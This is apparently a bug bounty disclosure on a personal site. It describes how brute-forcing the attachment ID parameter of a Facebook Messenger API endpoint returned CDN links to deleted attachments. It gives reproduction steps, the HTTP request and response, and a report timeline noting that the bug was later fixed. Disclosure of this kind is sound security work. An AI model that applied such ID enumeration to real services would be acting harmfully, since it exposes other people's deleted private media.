Kassem Bazzoun

Published On: 05 Jul 2020

Accessing Removed Attachment in Facebook Messenger

Messenger | Other

There is a GraphQl call in Facebook Messenger application ( android ) , that's responsible to fetch the CDN URL for attachments sent via the application ( audio , video , images ) , by sending the id of the file , it was possible to retrieve this link for a deleted attachment within < 24-48 hour .


A malicious user is able to access removed attachments sent to his inbox .

Reproduction Steps


User A sent a wrong image to User B  then he deleted it immediately before User B seeing it .


User B opened his messenger and he wants to access this deleted file 


User B start brute forcing the attachement id which  is the  parameted aid 



/method/messaging.getAttachment?access_token=EAADo1TDZCs.........o4lRwqrfAZD&mid=m-XN2Vy0XGTTNHtI&aid=557707478236527&format=binary HTTP/1.1
X-ZERO-EH: d74d3a21bff49a7491baf87adea0d45d


The Direct link of this deleted attachement will be located inside the Response "Location  Header ". and the user will be able to see the CDN link before it goes away so he has 24-48 hours for doing this action .

HTTP/1.1 302 Found
facebook-api-version: v1.0
Strict-Transport-Security: max-age=15552000; preload
Pragma: no-cache
x-fb-rev: 1001584889
Access-Control-Allow-Origin: *
Cache-Control: private, no-cache, no-store, must-revalidate
Location: https://scontent.xx.fbcdn.net/v/wl/t1.15752-9/fr/cp0/e15/q65/60433625_46908339sdsdsdstestttttttttt6_n.jpg?_nc_cat=109&_nsdsdsdsdsm&_nc_cid=0&_nc_zor=9&_nc_ht=scontent.xx&_nc_tp=12&oh=6244490ac616aab8cf147b52efcf78fe&oe=5EA5A635
x-fb-trace-id: CtO/imxWAOZ
x-fb-request-id: ALaOZmfAQZWFm3Mq6fDyKIe
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Content-Type: text/html; charset="utf-8"
X-FB-Debug: kqTxp00l0Lh8bZ9usadasdsGwrme+TNrBLG6ofknnZLsEh87C3UgnRukYBmwH+w==
Date: Wed, 08 Jan 2020 13:13:56 GMT
Connection: close
Content-Length: 0




Show Image

Why I sent this as a bug?

As we know that CDN will be go away after some times but I sent this bug because the user who receive the deleted attachment has no way to retrieve the CDN link but it's possible always to brute forcing a digit number ( attachement id ) through this endpoint to retrieve this CDN link . Some cases can't be handled from Facebook side due to how the internet works( e.g user has an extension on his browser to check the file once it's sent and saved it locally before it's deleted ) , but in the case I sent it's the Facebook responsibility and this bug can be mitigated by implementing some checks on the "aid" parameter so if the file is deleted , the server shouldn't return the CDN link .


I noticed that this bug was fixed by Facebook , so once the file is deleted the server wont return the CDN link on the Location header , and it will throw an Error ( 400 Bad Request) . Error 509: Invalid attachment id (509)

Kassem 08 Jan 2020

Report Sent

Facebook 10 Jan 2020

Marked as Informative Due to how the internet operates, it is not always possible to retroactively prevent a person from accessing information after it has been delive ... See More

Kassem 10 Jan 2020

Replying with some details Replying to Facebook that's possible to prevent someone from accessing that's file by making the proper checks on the parameter "aid" so if this ... See More

Facebook 11 Jan 2020

Facebook replied with same response Yea this is because it's cached on a cdn. These will eventually go away but as I mentioned earlier. It is not always possible to retroactively pr ... See More